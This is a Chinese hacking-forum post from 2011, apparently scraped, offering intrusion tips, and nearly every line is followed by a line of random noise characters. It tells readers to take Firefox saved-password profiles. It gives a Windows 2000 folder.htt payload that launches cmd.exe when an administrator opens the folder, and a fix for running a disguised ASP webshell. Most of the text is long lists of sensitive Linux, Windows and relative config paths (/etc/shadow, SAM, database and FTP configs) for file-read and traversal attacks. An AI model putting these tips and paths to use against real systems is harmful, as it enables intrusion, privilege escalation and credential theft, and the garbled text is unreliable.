/ |( T8 M5 n- G/ u5 M/ s$ }* O7 r
WScript.Quit
! }8 {( J6 G- K* y6 A
复制代码
' P4 m& [# t2 F8 j/ t5 G$ I
----------------------2011新气象,欢迎各位补充、指正、优化。----------------
/ `& p* T, U7 n2 t( ], }
1、Firefox的利用(主要用于内网渗透),火狐浏览器的密码储存在C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\文件夹,打包后,本地查看。或有很多惊喜~
& J+ S- `. a+ l% I! F
2、win2k的htt提权(注:仅适合2k以及以下版本,文件夹不限,只读权限即可)
6 O4 u7 v% o4 r$ e
将folder.htt文件,加入以下代码:
) {+ ?7 _0 h4 ~0 q b
<OBJECT ID=RUNIT WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="cmd.exe">
9 H6 ]! k0 B- K6 o/ J. o+ Q
</OBJECT>
! ~% M" [& I% f0 D: B4 Y& Y' \
复制代码
0 M, Y6 T6 E5 A! q0 |& z) K5 _
然后与desktop.ini、cmd.exe同一个文件夹。当管理打开该文件夹时即可运行。
# X7 y, k) P+ B5 i$ z3 k
PS:我N年前在邪八讨论过XP下htt提权,由于N年前happy蠕虫的缘故,2K以后都没有folder.htt文件,但是xp下的htt自运行各位大牛给个力~
% B+ a! b0 \! N$ h7 v* l
asp代码,利用的时候会出现登录问题
# c' P @6 k8 N9 j4 x" y
原因是ASP大马里有这样的代码:(没有就没事儿了)
- v$ ~: _; G3 h& N# Q
url=request.severvariables("url")
- Y0 L5 A0 l1 p: m+ i
这里显示接收到的参数是通过URL来传递的,也就是说登录大马的时候服务器会解析b.asp,于是就出现了问题。
% D* i4 w+ K( Y* g6 ~7 C: m
解决方法
; V! g" s2 {! {; U9 m0 `) t
url=request.severvariables("path_info")
% n; n6 e# v T; j4 g
path_info可以直接呈现虚拟路径 顺利解析gif大马
/ E a0 s0 P! z) q, ^" Q1 M
" S+ k" x8 B) B
==============================================================
+ ?% e8 m s" C6 \
LINUX常见路径:
; B" G% \" J" C6 P
$ ^+ d* |; i0 B( m4 w
/etc/passwd
7 a- b" b/ v0 k" Q4 y
/etc/shadow
1 \2 s0 c1 u1 R
/etc/fstab
! k8 Z5 c- C1 `3 u% L
/etc/host.conf
. U r; |( z3 t* k; b* ?
/etc/motd
; u$ |& T6 B) q& }* [
/etc/ld.so.conf
[$ l0 y3 Y# u" g8 i$ I5 l
/var/www/htdocs/index.php
* U' W, T5 t( m8 S
/var/www/conf/httpd.conf
, J+ g) G9 [) p. e2 _
/var/www/htdocs/index.html
4 H6 O# |; A6 J) \( S$ X
/var/httpd/conf/php.ini
/ j3 e; ~% ~, b }! X
/var/httpd/htdocs/index.php
5 q( \# z% p4 ]
/var/httpd/conf/httpd.conf
& o* N& k) W' A, ^0 c) D
/var/httpd/htdocs/index.html
! |( F Z! k' u) k0 g
/var/httpd/conf/php.ini
! J8 i6 B' @7 {, Z
/var/www/index.html
% W( a+ S) z3 N
/var/www/index.php
: v' W V8 [; x/ F! V+ i( ]! a
/opt/www/conf/httpd.conf
( |: S. c0 X+ I { m' m( e
/opt/www/htdocs/index.php
3 Q$ c+ C n$ [% O: k: |+ M
/opt/www/htdocs/index.html
) L' G4 k+ u5 l4 w9 Y# h' O
/usr/local/apache/htdocs/index.html
. o! g2 o1 {2 O) _2 w% {- Z
/usr/local/apache/htdocs/index.php
3 ?& L1 u- m/ i% X8 f/ k
/usr/local/apache2/htdocs/index.html
5 E% Y Z1 j' l' \0 C
/usr/local/apache2/htdocs/index.php
6 g: D/ I2 h" N7 L, j
/usr/local/httpd2.2/htdocs/index.php
" u4 G8 c( ^& z% w
/usr/local/httpd2.2/htdocs/index.html
9 I$ M4 g3 Q9 b2 p3 S( X6 ~
/tmp/apache/htdocs/index.html
( a6 I* y: q. y0 I$ l
/tmp/apache/htdocs/index.php
8 ]3 u& U9 D% s# M$ |+ _& q
/etc/httpd/htdocs/index.php
7 B+ W$ p8 G/ t% \
/etc/httpd/conf/httpd.conf
$ P. z8 @. n8 a! i+ Y( w8 p4 Z/ e
/etc/httpd/htdocs/index.html
5 h* v+ ], I6 ]" u( ~, l$ P
/www/php/php.ini
" I/ p5 Q" n8 h* Z2 U; ~6 w
/www/php4/php.ini
, f* {9 r4 F, A% x
/www/php5/php.ini
2 I, g- E# z/ D' R |, Q7 |6 s9 a* j
/www/conf/httpd.conf
7 s# l' U+ V& ~4 o$ w: l2 s# X9 x
/www/htdocs/index.php
]# F9 H3 R% `; `, @% G2 E8 M
/www/htdocs/index.html
0 F8 e; T# [0 z8 [
/usr/local/httpd/conf/httpd.conf
, A, E: u$ ^ u( V$ B" E- f
/apache/apache/conf/httpd.conf
6 X2 n1 N( A' @( i7 F7 ?
/apache/apache2/conf/httpd.conf
4 L$ U2 U6 D k3 F0 Z0 \7 v, u
/etc/apache/apache.conf
& p+ o+ h7 |9 b' f+ q6 u3 R
/etc/apache2/apache.conf
6 X2 p/ H. {' w2 M4 _1 y6 T
/etc/apache/httpd.conf
1 Z% o# Q2 I+ h1 X7 ?; V
/etc/apache2/httpd.conf
3 |6 ]4 }- w. z7 n: N1 F
/etc/apache2/vhosts.d/00_default_vhost.conf
) v* g! w7 O* \2 \! ?
/etc/apache2/sites-available/default
) r: a- m* }- M& E" f
/etc/phpmyadmin/config.inc.php
! h( a) L8 R+ k' T9 ?+ x
/etc/mysql/my.cnf
( B. e+ [# ]; x* c
/etc/httpd/conf.d/php.conf
6 I3 P8 c4 E7 M
/etc/httpd/conf.d/httpd.conf
; ^* ~! D7 {" k0 U0 K: N
/etc/httpd/logs/error_log
8 Q7 e- M9 y0 B% ~. n3 ~
/etc/httpd/logs/error.log
) P0 L# @3 l; L+ j- k- k& S! L
/etc/httpd/logs/access_log
& Z; w ?. x* `$ x
/etc/httpd/logs/access.log
8 \4 t8 C4 e9 ?6 e# `; W
/home/apache/conf/httpd.conf
# S4 ?8 N: @% T% R7 S
/home/apache2/conf/httpd.conf
. M4 }/ h4 f( s/ k
/var/log/apache/error_log
& b, x% N- b2 N
/var/log/apache/error.log
6 S# c: O$ M5 x5 M
/var/log/apache/access_log
+ X1 s, {0 N' Y0 Q1 h' i* r
/var/log/apache/access.log
+ f. A' W7 d' o. ]6 U
/var/log/apache2/error_log
" k2 v" V) w# Q& r" M2 {
/var/log/apache2/error.log
& t% `. t* b: l9 |1 c4 P; d5 [
/var/log/apache2/access_log
; G0 V6 B, C* n7 I ?( f
/var/log/apache2/access.log
2 `& ?6 h* A! q
/var/www/logs/error_log
) {. [! @8 \, u1 R5 b. E! s
/var/www/logs/error.log
0 `7 y- w% R( Q/ y0 v0 |/ m; l
/var/www/logs/access_log
( }0 ^) {9 M- S+ r" P
/var/www/logs/access.log
C0 {. d9 w( d0 X+ V
/usr/local/apache/logs/error_log
' O5 X' [0 P/ O5 q! N
/usr/local/apache/logs/error.log
' z, w0 v$ V0 K9 j( D
/usr/local/apache/logs/access_log
$ p& g% L6 M* k. Z
/usr/local/apache/logs/access.log
7 t7 {7 \# G. [9 q
/var/log/error_log
" O; i$ G3 L. a, T" }) z
/var/log/error.log
8 D" f7 x3 Q( s o
/var/log/access_log
( Y' w3 @) L7 K' j4 t
/var/log/access.log
( T* U3 Z7 t" U- E& }1 y
/usr/local/apache/logs/access_logaccess_log.old
; {1 h4 t% k/ P0 [9 T
/usr/local/apache/logs/error_logerror_log.old
& |- {) g) T& |: g
/etc/php.ini
0 H( w/ I! q& y* L. {2 t
/bin/php.ini
, ^; P; h4 w& Z) p3 Z
/etc/init.d/httpd
: f4 D2 ^ c3 @/ U9 S! J
/etc/init.d/mysql
* Y# k! N. F; T( u8 P% J
/etc/httpd/php.ini
) J4 _; T' {3 W1 f6 ^8 z7 F5 E8 k8 @. i p
/usr/lib/php.ini
) _; D" O8 i' d% R w
/usr/lib/php/php.ini
; a" b# m8 e L; S- ^
/usr/local/etc/php.ini
2 G9 w9 {5 |8 u) E( T" x4 F
/usr/local/lib/php.ini
/ c% g+ y) N8 h; N" q
/usr/local/php/lib/php.ini
0 |) f* E) I+ l7 M8 a) n% M
/usr/local/php4/lib/php.ini
$ W& E; N; K* g* T5 Q% ?# b( x
/usr/local/php4/php.ini
6 k, C5 |/ p* P
/usr/local/php4/lib/php.ini
$ L8 P. c. h# E! ~% ?
/usr/local/php5/lib/php.ini
5 y, B- O1 r) a( C C- o% W; d
/usr/local/php5/etc/php.ini
) b/ T" W9 {" c! @
/usr/local/php5/php5.ini
6 h; J# x4 T1 z6 M {0 ^
/usr/local/apache/conf/php.ini
& d4 b [# a9 G$ e X$ F: H
/usr/local/apache/conf/httpd.conf
" L! N8 U6 |- [+ z
/usr/local/apache2/conf/httpd.conf
/ S; T+ i4 O0 p8 |3 V8 E7 q, k I
/usr/local/apache2/conf/php.ini
# b8 @& e1 m( [$ U' R# X1 b# C
/etc/php4.4/fcgi/php.ini
. G' ^, _: b/ l$ N% F
/etc/php4/apache/php.ini
. b- }% i8 Q! Y" ]& a( x# d
/etc/php4/apache2/php.ini
# y8 \6 ^! {" Z+ [5 w. [/ f- L: L
/etc/php5/apache/php.ini
7 i) V, P6 _. h7 D4 X
/etc/php5/apache2/php.ini
$ J$ }) q, H8 H+ |9 C
/etc/php/php.ini
( l, d1 W m' w# k# L9 L" m
/etc/php/php4/php.ini
' E* ^2 L; m/ ^* [* c
/etc/php/apache/php.ini
# z$ W0 b3 |/ h# t! Q' R1 O
/etc/php/apache2/php.ini
: E. b: i/ D: E" J5 v
/web/conf/php.ini
" r3 H3 @8 n. E
/usr/local/Zend/etc/php.ini
7 |, e- A3 d; v; p' j
/opt/xampp/etc/php.ini
4 r8 h7 Z. K4 d/ w; V
/var/local/www/conf/php.ini
# e. ~3 K6 A3 b# @- Y& D. Y! H! U; ?
/var/local/www/conf/httpd.conf
& i! e# ~* P3 `( ?
/etc/php/cgi/php.ini
) N) @1 Q# L3 H
/etc/php4/cgi/php.ini
3 {# h! O# j# L* f
/etc/php5/cgi/php.ini
9 j7 \$ G% Z' t: J( @* k; f2 m
/php5/php.ini
R6 T, ~: @9 y3 P7 j7 [0 w" }
/php4/php.ini
" t7 a7 |" p& h J, K X2 u) N
/php/php.ini
9 ?; m4 M' A/ K3 W# n9 n2 ]* C
/PHP/php.ini
2 l3 x+ @" n7 c; f( w% f2 M
/apache/php/php.ini
8 z! Y+ u3 q2 @7 v$ o
/xampp/apache/bin/php.ini
1 P. \" Q/ `: v( C6 c
/xampp/apache/conf/httpd.conf
1 t0 C3 _/ q& U
/NetServer/bin/stable/apache/php.ini
3 C0 I7 U; k# t! {5 H
/home2/bin/stable/apache/php.ini
8 `+ D, @5 t' d2 }4 N: Y) o
/home/bin/stable/apache/php.ini
% E/ @$ d3 l, R% z4 _
/var/log/mysql/mysql-bin.log
, v3 F' l2 G! D0 D3 y( O
/var/log/mysql.log
% A! [4 d4 i# g0 M3 W" `
/var/log/mysqlderror.log
6 ?+ ]. x! }$ {0 O& y; P
/var/log/mysql/mysql.log
! s) N" S) d* l0 T8 T3 ]* m5 T0 D$ M
/var/log/mysql/mysql-slow.log
f1 ]# N! Z/ W2 b8 q9 R+ S) T6 `6 E
/var/mysql.log
/ B$ f1 U. d$ w6 Y/ l) I8 J
/var/lib/mysql/my.cnf
+ Z, h5 } ? z4 L; e' k
/usr/local/mysql/my.cnf
2 u6 O e8 L* Z4 ?
/usr/local/mysql/bin/mysql
( F9 F k' |/ v
/etc/mysql/my.cnf
3 o3 ?2 Y/ Y; r1 J$ P a
/etc/my.cnf
?& o* n. f$ P6 ?
/usr/local/cpanel/logs
j e2 F6 k+ Y# D
/usr/local/cpanel/logs/stats_log
: z. K6 p! U# B1 |1 |0 Q, u# s
/usr/local/cpanel/logs/access_log
$ S# m X2 R4 _% N8 i
/usr/local/cpanel/logs/error_log
, p( |8 M3 \, e6 `, U+ @
/usr/local/cpanel/logs/license_log
2 S' q' n7 k- @0 ]( y0 s
/usr/local/cpanel/logs/login_log
. H% q4 }- U3 r& f9 Y, N, ~# k
/usr/local/cpanel/logs/stats_log
3 Q5 O. C$ |4 k0 s
/usr/local/share/examples/php4/php.ini
! T3 T" g; c) a3 V+ w, O9 d
/usr/local/share/examples/php/php.ini
1 p/ I- y' S4 r; h3 e9 W' {
. n2 z' `0 V } I" ?$ R
2..windows常见路径(可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘)
7 W# X+ \' S. _+ }
( s1 n* |$ K% p$ x0 _! o7 C
c:\windows\php.ini
1 ~! ^( _& U# a" |* _. v4 q: N
c:\boot.ini
- _4 ?( m2 Y. J# q% P, D) K: G4 |1 ~
c:\1.txt
' i/ }* Q- K% H }; U
c:\a.txt
( a1 K+ g# R! R8 b6 O8 u# U
" f# y, J5 l0 B
c:\CMailServer\config.ini
) I9 C/ X% u+ D+ `8 m- W. a& V9 N5 {
c:\CMailServer\CMailServer.exe
( L. w/ f7 y4 ]3 D
c:\CMailServer\WebMail\index.asp
: U% R. B# d& U4 X
c:\program files\CMailServer\CMailServer.exe
9 x( Z" O1 O" E+ `8 I# W5 K8 L
c:\program files\CMailServer\WebMail\index.asp
8 ]& _' M% z( V/ j3 i
C:\WinWebMail\SysInfo.ini
. h+ L5 ]) ^+ i" E( H4 e
C:\WinWebMail\Web\default.asp
: Z# p5 g% w6 n
C:\WINDOWS\FreeHost32.dll
& B3 b0 b; I& Z j" v3 G
C:\WINDOWS\7i24iislog4.exe
2 q3 y( I. s8 O d# X- h; P- r t' D
C:\WINDOWS\7i24tool.exe
}2 n x$ [" B( L) V* w7 K
" u2 e) v$ c* q0 M M6 w; ~
c:\hzhost\databases\url.asp
! @' r7 K( z0 H
" K0 I+ o: V8 }6 ]% B
c:\hzhost\hzclient.exe
* G( k! @8 n6 N
C:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnk
4 \: Q9 {% e$ i R! c! M1 l
' [' S/ P0 y- v% \" N6 N& N. }1 {" K5 e
C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk
1 Q" A0 n8 Y" q8 L' o0 l
C:\WINDOWS\web.config
0 ]* F. U; o" a) u: V
c:\web\index.html
4 Z/ h* B7 V+ J7 L& a& w
c:\www\index.html
! J' u* W2 w! X' Y) U0 Q
c:\WWWROOT\index.html
' @( ^/ Z' S3 `: |0 |3 J
c:\website\index.html
: n6 e z3 N2 L2 N
c:\web\index.asp
z& o3 P$ M! G. j; t1 J* A
c:\www\index.asp
- G* f2 y2 G) X" ]: D
c:\wwwsite\index.asp
4 X# {( {% o- O Z" N s0 x- S) Q
c:\WWWROOT\index.asp
2 X( B# j7 \3 A
c:\web\index.php
% L) w8 [' F" v& U
c:\www\index.php
% _+ ]$ w, G+ {- N. h. Z* f
c:\WWWROOT\index.php
; S( E$ z9 u3 K% R6 d1 \8 _
c:\WWWsite\index.php
9 H5 R+ `" ]) a! y
c:\web\default.html
7 w) Z& Q5 g( v& c$ F1 Q- V' c
c:\www\default.html
8 {5 f8 T( R# X# C
c:\WWWROOT\default.html
3 q' V6 K# w0 a
c:\website\default.html
% v- @1 o% C: D. U: l
c:\web\default.asp
1 g* K/ M% Q& o% n% F
c:\www\default.asp
- F4 M" E3 L9 p2 ]3 ^
c:\wwwsite\default.asp
9 T% |# r/ n) R3 }
c:\WWWROOT\default.asp
" \- d/ d! T% T$ U
c:\web\default.php
. b# q b* O1 E9 [. O: T! a
c:\www\default.php
/ O- A A8 Y2 F3 Q* A. x; c- R! {
c:\WWWROOT\default.php
$ y% L0 L% v( N/ w* I8 Y
c:\WWWsite\default.php
4 q: [' S6 U* E% C5 W7 j
C:\Inetpub\wwwroot\pagerror.gif
, v( a7 o8 w& n- G9 `. H
c:\windows\notepad.exe
( r( n8 g$ _9 {4 B2 V6 u. N
c:\winnt\notepad.exe
4 ^2 q5 R# v* u. g; D0 q* r. U
C:\Program Files\Microsoft Office\OFFICE10\winword.exe
, F- R/ }* |2 j
C:\Program Files\Microsoft Office\OFFICE11\winword.exe
~8 ] a$ L; R+ O6 p% S; T
C:\Program Files\Microsoft Office\OFFICE12\winword.exe
8 o# O- R4 O0 r/ d" t4 H
C:\Program Files\Internet Explorer\IEXPLORE.EXE
5 a: ], e3 P7 G7 d8 d
C:\Program Files\winrar\rar.exe
: Z0 u4 ?8 T2 L! r. l6 M7 u. D
C:\Program Files\360\360Safe\360safe.exe
# {, c1 n8 N1 d$ ^# I, G
C:\Program Files\360Safe\360safe.exe
5 O3 u ?% H/ i2 i
C:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log
# Y- h3 A! B2 W9 v4 a5 _
c:\ravbin\store.ini
( h5 s; S' r% _+ p
c:\rising.ini
# w; b: z3 C% a4 U4 u* e# H( O
C:\Program Files\Rising\Rav\RsTask.xml
6 a9 c w* I9 L/ ^+ R! y: }, Y
C:\Documents and Settings\All Users\Start Menu\desktop.ini
9 X6 n& w0 I' p& A4 }8 C7 y
C:\Documents and Settings\Administrator\My Documents\Default.rdp
- }0 ], j8 P9 X9 _' C
C:\Documents and Settings\Administrator\Cookies\index.dat
7 k4 M" Y, B4 v- w, E7 \7 ^
C:\Documents and Settings\Administrator\My Documents\新建 文本文档.txt
! M$ p0 ] T; d0 T( l' ^
C:\Documents and Settings\Administrator\桌面\新建 文本文档.txt
& X7 }. ^( c9 _5 A% o) G
C:\Documents and Settings\Administrator\My Documents\1.txt
2 u$ {" n6 {2 U& d& s
C:\Documents and Settings\Administrator\桌面\1.txt
+ ]6 V ]/ J j- K
C:\Documents and Settings\Administrator\My Documents\a.txt
' u1 K, N0 r* d& }
C:\Documents and Settings\Administrator\桌面\a.txt
3 D( d1 y( Y) C6 j1 a/ z
C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
" Z" w$ c* y* i& U2 G' n% r: {: j
E:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm
6 [. p2 L7 t! E3 }- y: V
C:\Program Files\RhinoSoft.com\Serv-U\Version.txt
. E. E" [& d1 r" n6 e$ \
C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
5 ^2 l0 ^ o0 O6 W$ U
C:\Program Files\Symantec\SYMEVENT.INF
% x8 X: I n( c! i! J+ C
C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
. F8 s' s( n& x: c+ L
C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf
$ ]9 R8 k' \" F
C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf
; D& u) ~4 J: m8 X
C:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf
6 c( O! ~3 M1 z* w0 _
C:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm
6 z3 H2 z) f( x# d) ?+ n8 ]
C:\Program Files\Microsoft SQL Server\MSSQL\README.TXT
+ v! W( z) b) e; w& v3 a' Z2 w3 o
C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll
" z9 K, w$ [ x$ x/ Y
C:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini
* M. V2 Z' n2 }
C:\MySQL\MySQL Server 5.0\my.ini
9 V5 c4 t c6 K7 H' A( F8 }# E4 W
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
, X: |0 Z, a [' S3 V4 j
C:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm
$ w( [: f% u" U6 C
C:\Program Files\MySQL\MySQL Server 5.0\COPYING
+ I; l. G0 e' ?* l0 q
C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql
2 u, g9 b! l% i+ G5 D1 t( A
C:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe
* V! o+ G& U h( r" `5 K
c:\MySQL\MySQL Server 4.1\bin\mysql.exe
: k# a+ I9 t$ D/ p, Q( Z# i
c:\MySQL\MySQL Server 4.1\data\mysql\user.frm
9 E* s! p4 M' F3 l+ e
C:\Program Files\Oracle\oraconfig\Lpk.dll
" {) l/ F0 R7 T- n% ~! }2 u, m
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
8 x8 X# }" l! h3 |1 c% o1 I6 q
C:\WINDOWS\system32\inetsrv\w3wp.exe
/ _6 Y+ d+ T$ t5 _! y
C:\WINDOWS\system32\inetsrv\inetinfo.exe
; o7 b* t3 T y$ ]3 G' n
C:\WINDOWS\system32\inetsrv\MetaBase.xml
3 T. o2 q- c1 t7 u# `
C:\WINDOWS\system32\inetsrv\iisadmpwd\achg.asp
# o* O* ]' n) @& b. M5 x
C:\WINDOWS\system32\config\default.LOG
# B0 m" X/ H7 c# B4 X. x
C:\WINDOWS\system32\config\sam
& a7 u$ i5 U1 @/ r
C:\WINDOWS\system32\config\system
5 Y, _" Y- `2 B7 z5 m
c:\CMailServer\config.ini
$ F: G* l5 _6 D6 ~
c:\program files\CMailServer\config.ini
% Z7 ^& r0 L1 V: x
c:\tomcat6\tomcat6\bin\version.sh
; h( i/ R% {1 f
c:\tomcat6\bin\version.sh
+ q; M: F4 v2 A) y
c:\tomcat\bin\version.sh
R, n, H; W$ _7 k
c:\program files\tomcat6\bin\version.sh
. U. I- {9 T% U1 c s
C:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh
- o! \; X! d C6 W) z3 [: G* _+ [- ^
c:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log
, Q, i9 E6 l/ p( S) A- C0 U
c:\Apache2\Apache2\bin\Apache.exe
2 B2 D4 V. Z7 t' k: K
c:\Apache2\bin\Apache.exe
# K3 v, l& M, Y0 c2 n/ s& {
c:\Apache2\php\license.txt
2 G& u1 z L$ ^: `! H/ z- Y) F
C:\Program Files\Apache Group\Apache2\bin\Apache.exe
! _# h* X6 r5 ]/ ?: o3 h' X
/usr/local/tomcat5527/bin/version.sh
' u' V0 e4 {* }0 O: O4 f" j' @6 u
/usr/share/tomcat6/bin/startup.sh
! p1 L* y3 a/ n2 Q& _0 h0 v
/usr/tomcat6/bin/startup.sh
; z& @& U2 m( v6 \" r
c:\Program Files\QQ2007\qq.exe
# ?; ?( P, _& l7 _0 f
c:\Program Files\Tencent\qq\User.db
% n5 d* w) S3 k b" ?- R
c:\Program Files\Tencent\qq\qq.exe
5 T# h9 m* R1 f0 U0 Y
c:\Program Files\Tencent\qq\bin\qq.exe
- [% l; F4 k1 K
c:\Program Files\Tencent\qq2009\qq.exe
/ Q1 a- w& }( i8 F) M" R) n
c:\Program Files\Tencent\qq2008\qq.exe
# N1 ` {7 y8 E, |' O, U5 a
c:\Program Files\Tencent\qq2010\bin\qq.exe
; X! v9 `1 d8 C) U' l8 g
c:\Program Files\Tencent\qq\Users\All Users\Registry.db
% I+ g/ w1 g4 H: ~1 I% @# i4 A8 u
C:\Program Files\Tencent\TM\TMDlls\QQZip.dll
! B9 j- a4 w3 E& K/ [7 I
c:\Program Files\Tencent\Tm\Bin\Txplatform.exe
8 N6 Z8 X6 X7 ?/ e
c:\Program Files\Tencent\RTXServer\AppConfig.xml
' _0 A% `& }! B. Q8 k# \$ j
C:\Program Files\Foxmal\Foxmail.exe
$ U- c! Y9 I- w7 B! ^, E
C:\Program Files\Foxmal\accounts.cfg
% r) ~4 l% m* Y A
C:\Program Files\tencent\Foxmal\Foxmail.exe
$ t: k0 g- c: ] d. n- m4 Y
C:\Program Files\tencent\Foxmal\accounts.cfg
+ Z9 S, `! I) v( r
C:\Program Files\LeapFTP 3.0\LeapFTP.exe
7 ]8 d; o+ d) e3 z- p
C:\Program Files\LeapFTP\LeapFTP.exe
8 ~# z. |4 B9 o' x
c:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe
+ X+ `+ z( r" m* e1 D6 }4 {
c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt
+ T; c& B5 D N- h, E, P
C:\Program Files\FlashFXP\FlashFXP.ini
8 \# {2 [, W3 i/ q7 `9 ^5 I
C:\Program Files\FlashFXP\flashfxp.exe
9 p! O5 A% L& Q- e& a) s
c:\Program Files\Oracle\bin\regsvr32.exe
# [$ f' O( G! L! ~' W3 e
c:\Program Files\腾讯游戏\QQGAME\readme.txt
$ b% z+ F! E9 q
c:\Program Files\tencent\腾讯游戏\QQGAME\readme.txt
: ?6 J# `; r. @( o. r4 M7 x4 i
c:\Program Files\tencent\QQGAME\readme.txt
* s4 ?0 C& b2 F8 m" P3 B
C:\Program Files\StormII\Storm.exe
1 K( t, z# j! O8 C& i
, Z8 ~2 J9 q& V. j
3.网站相对路径:
, R7 o9 Q/ @ Q* n
6 w1 W% d5 @" c" Z) @
/config.php
1 [- u" f8 I0 k( [
../../config.php
" c$ w) Q% G# h8 O9 Y z
../config.php
, X# W1 s0 r5 I! Q
../../../config.php
H) C. c( b! x9 K3 C5 u
/config.inc.php
2 O; V; E: N, w- J9 X) _
./config.inc.php
7 l) \/ [. G) ~% H% r2 W% f
../../config.inc.php
m/ e+ ?) Y3 {5 B k1 F3 p9 k
../config.inc.php
6 y' ]/ G% |& B% e0 E
../../../config.inc.php
; K' k1 B6 l9 N. N+ `
/conn.php
6 G' i& u8 S: n6 e) l
./conn.php
! b7 x( d1 S' [, U* v0 `
../../conn.php
7 }# a2 `+ t$ N+ L2 O
../conn.php
2 i f: c7 A, e% [2 l
../../../conn.php
# }. A( `2 S) F( g
/conn.asp
5 O" t2 o. E! C* u/ }
./conn.asp
" C. e' x _# a+ I6 M; p7 L% y" b
../../conn.asp
$ G r {( Z& i+ N5 T+ [2 X
../conn.asp
, y( x' C* y D% M3 \
../../../conn.asp
) y3 V1 x. y" g" f% k' u P
/config.inc.php
7 C9 G+ p6 l" @8 r% ~8 `
./config.inc.php
: e. z( Q3 V1 Z1 W+ d0 K
../../config.inc.php
+ X9 u9 r1 F1 L
../config.inc.php
& Y/ J# Q _ H! ]" }, U6 V" g F
../../../config.inc.php
! u9 g$ T+ q8 _
/config/config.php
7 z! H Z' }, ]* v" f; `
../../config/config.php
' u' r' `5 B3 K( o3 F1 v6 V
../config/config.php
1 Y3 b9 u( v- Z' O9 P5 {2 l
../../../config/config.php
- m: R6 i) T4 h" U0 D0 G
/config/config.inc.php
6 k: x# y# I/ M7 I8 u" ]! l
./config/config.inc.php
& i8 m. X) `7 S3 C. R' |1 J
../../config/config.inc.php
* {4 z+ e3 r+ v9 @2 U( N" c. x2 R
../config/config.inc.php
, j0 _- U; m5 s8 [& d$ [
../../../config/config.inc.php
! X' I2 C/ w) k3 Y
/config/conn.php
/ x. N( T4 T+ O6 }: i W, A
./config/conn.php
0 P. ~: \, t' q$ ?4 i1 q
../../config/conn.php
. s% u9 F. J& h- W% p& ~4 a
../config/conn.php
* H: e9 k. _ c$ N2 O" H2 W: w
../../../config/conn.php
, ]( X ` z5 D/ ?) \9 X6 ?
/config/conn.asp
: q; g4 G- g! |5 L" F8 v
./config/conn.asp
* P5 {8 K/ G2 ]; ?" x$ y' ~5 D! G
../../config/conn.asp
" z" }, U4 q7 \) ?- \6 F0 V8 J
../config/conn.asp
8 Z/ l: v$ e5 y) ~
../../../config/conn.asp
2 a x% r. C" f8 l
/config/config.inc.php
# j1 w% `( y$ V
./config/config.inc.php
! q; z2 P. i8 ~' F
../../config/config.inc.php
% x' ^7 ^: ?# K) L4 e
../config/config.inc.php
! I7 Z& A5 k: K( X. ~! {0 \
../../../config/config.inc.php
" y& m+ C+ M' x) N B
/data/config.php
& p, D% \- g# d$ ^
../../data/config.php
; Z6 K3 ^- f- l" f. \8 _
../data/config.php
4 z. }- y/ r6 I' [6 `. k
../../../data/config.php
% s7 j: u3 ~, u; h6 T
/data/config.inc.php
0 X& z2 F( \( _+ O; d$ f/ z
./data/config.inc.php
6 T5 m. x7 R4 u6 ^5 }( H3 A
../../data/config.inc.php
' v v# p( d3 m) G, J; M& f
../data/config.inc.php
* T' a3 G+ ?3 L9 \! @& H H
../../../data/config.inc.php
& J0 O% u# _( d4 L! T6 h
/data/conn.php
( ^" |3 x# Q/ Z8 i
./data/conn.php
9 c8 j4 H3 n& c% L; J5 x
../../data/conn.php
' h- {6 s% d/ C' z4 I. f
../data/conn.php
% z/ B& F2 H! f
../../../data/conn.php
$ k2 R- s- V1 i. p
/data/conn.asp
2 [5 n$ {" P* U& _1 q
./data/conn.asp
$ D5 W# Y5 s2 f1 H, x+ s- K7 T
../../data/conn.asp
1 |3 u7 U+ g6 k
../data/conn.asp
5 J6 a) {$ U5 w& S
../../../data/conn.asp
4 N6 V4 d9 a: w
/data/config.inc.php
/ r# S2 D8 V# Q, W/ O+ b+ s9 l
./data/config.inc.php
' q e7 a" u4 P( U. P5 l, O
../../data/config.inc.php
. d3 Z$ Q1 l: ?" r
../data/config.inc.php
# w; S1 K. Q0 z) O! R" ~
../../../data/config.inc.php
8 V: S O) T- k+ }, F4 s
/include/config.php
$ u# C% E+ [, p4 E/ X0 u
../../include/config.php
5 V# v% Q* l# k, S
../include/config.php
+ `4 ?7 V) F. i% Q+ s* L3 }
../../../include/config.php
% N) Z: J( U" y% s% _: i
/include/config.inc.php
) {+ C. m1 N S, x& n, T! _/ p
./include/config.inc.php
" q" z5 \. Q5 i) ?; W7 |
../../include/config.inc.php
) ^% V/ [% G V, C
../include/config.inc.php
' U& B; n2 {" p6 i% l
../../../include/config.inc.php
3 ^0 {0 @) s9 ^* ~+ s/ B
/include/conn.php
: @; h# Y" I$ ]2 v; p2 w
./include/conn.php
/ d2 B& a( H! {0 h+ m
../../include/conn.php
0 h% f# L3 J% X8 E9 B1 x' }
../include/conn.php
' y2 w: j' i7 U! g
../../../include/conn.php
. C' A, x% t5 k
/include/conn.asp
